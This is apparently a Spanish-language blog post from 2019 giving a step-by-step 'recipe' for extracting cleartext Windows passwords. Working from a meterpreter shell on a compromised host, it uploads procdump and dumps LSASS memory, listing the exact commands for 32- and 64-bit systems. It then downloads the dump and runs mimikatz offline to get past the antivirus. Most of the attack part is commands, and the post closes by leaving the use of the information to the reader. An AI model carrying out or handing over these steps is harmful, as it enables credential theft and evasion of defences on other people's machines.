viernes, 6 de septiembre de 2019

Por el poder de procdump!!!!!!!!!


Un AV (antivirus) tuvo a culpa y eso me permitió conocer una manera de extraer el material de los sueños de un ordenador: la memoria RAM asociada al proceso LSASS, de una manera no habitual.

NOTA: Este proceso almacena en la memoria RAM asociada las contraseñas en claro de los usuarios de un ordenador basado en un sistema Windows. Muchas herramientas, lanzadas en local, permiten extraer esa información, como pueda ser: mimikatz o Empire mod HackPlayers.

Para la extracción del material de los sueños, necesitaremos la siguiente lista de ingredientes:

1.- Una pizca de Procdump (herramienta perteneciente a la tool: SysInternals)
2.- Mimikatz, pero ésta vez no lo utilizaremos en el ordenador remoto, si no en una máquina virtual bajo nuestro control
3.- Entorno generador de máquinas virtuales.

Comencemos con la receta:

1.- Tener una Shell remota con el ordenador al cuál queramos extraerle las credenciales de sus usuarios EN TEXTO CLARO.

NOTA: En este punto no puede ayudar, cada uno como pueda.

Vulnerabilidad encontrada en nuestro entorno de pruebas

Exploit preparado

Máquina vulnerada.

2.- Subir la ejecutable: Procdump.

Este ejecutable, es un ejecutable “legitimo” utilizado tanto en proceso de análisis forense como en procesos de administración de sistemas. Nos permite dumpear/clonar la memoria RAM y almacenarla en un archivo.

En nuestro entorno (Shell remota basada en meterpreter) se ha utilizado el comando: upload <archivo a subir> <ubicación en la máquina remota>

Archivo: procdump.exe subido al disco duro: C:

Archivo: procdump.exe, ubicado en la unidad C: del host vulnerado

3.- Dumpear la memoria asociada al proceso: lsass.exe

En este punto tenemos que tener en cuenta el entorno en donde nos encontramos.

Entorno
Comando
Sistema de 32 bits
Procdump.exe -accepteula –ma lsass.exe lsass.dump
Sistema de 64 bits
Procdump.exe -accepteula -64 –ma lsass.exe lsass.dump

Leyenda:

-accepeula         -> permite aceptar la licencia de Sysinternals por línea de comandos
-ma                       -> permite escribir un archivo con la memoria extraída
-64                         -> permite indicar que estamos en un entorno de 64 bits.

Proceso de dumpeo lanzado y completado


4.- Extraer el archivo anteriormente dumpeado del sistema “hackeado”, llevándolo al sistema que tenemos controlado



En nuestro entorno (Shell remota basada en meterpreter) se ha utilizado el comando: download <archivo ubicado en la máquina remota> <ubicación en la máquina local>



Descarga del archivo dumpeado

5.- Montar una máquina virtual con el mismo sistema operativo que el sistema del cual hemos extraído la memoria RAM

Resumiendo


Nuevo entorno

6.- Ejecutar mimikatz sobre el archivo que contiene la memoria RAM dumpeada.

Para lo cual:

                1.- Ejecutamos: mimikatz
                2.- Ejecutamos el comando: sekurlsa::mimidump <archivo dumpeado>
3.- Ejecutamos el comando: sekurlsa::logonPasswords full

Ejecución de mimikatz en otro entorno similar, en cuanto a sistema operativo, al que le hemos dumpeado la memoria

En cualquier caso …

Lo que hagas con la información es cosa tuya, no mía ... pero ten conciencia.